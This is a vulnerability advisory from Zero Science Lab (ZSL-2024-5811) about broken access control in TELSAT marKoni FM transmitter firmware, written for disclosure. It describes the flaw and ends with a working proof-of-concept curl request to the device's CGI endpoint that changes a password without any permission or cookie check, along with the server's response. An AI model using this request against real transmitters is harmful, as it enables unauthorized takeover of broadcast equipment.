TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control Change Password Vendor: TELSAT Srl Product web page: https://www.markoni.it Affected version: Markoni-D (Compact) FM Transmitters Markoni-DH (Exciter+Amplifiers) FM Transmitters Markoni-A (Analogue Modulator) FM Transmitters Firmware: 1.9.5 1.9.3 1.5.9 1.4.6 1.3.9 Summary: Professional FM transmitters. Desc: Unauthorized user could exploit this vulnerability to change his/her password, potentially gaining unauthorized access to sensitive information or performing actions beyond her/his designated permissions. Tested on: GNU/Linux 3.10.53 (armv7l) icorem6solox lighttpd/1.4.33 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2024-5811 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5811.php 10.11.2023 -- PoC request of a user changing his own password. Only admin can edit users. No permissions or Cookie check. $ curl -s -H "Cookie: name=user-1702119917" \ http://10.0.8.3:88/cgi-bin/ekafcgi.fcgi?OpCode=4&username=user&password=user&newpassword=t00tw00t HTTP/1.1 200 OK Content-type: text/html Cache-control: no-cache Set-Cookie: name=user-1702119917; max-age=315360000 Transfer-Encoding: chunked Date: Sat, 9 Dec 2023 11:05:17 GMT Server: lighttpd/1.4.33 oc=4&resp=0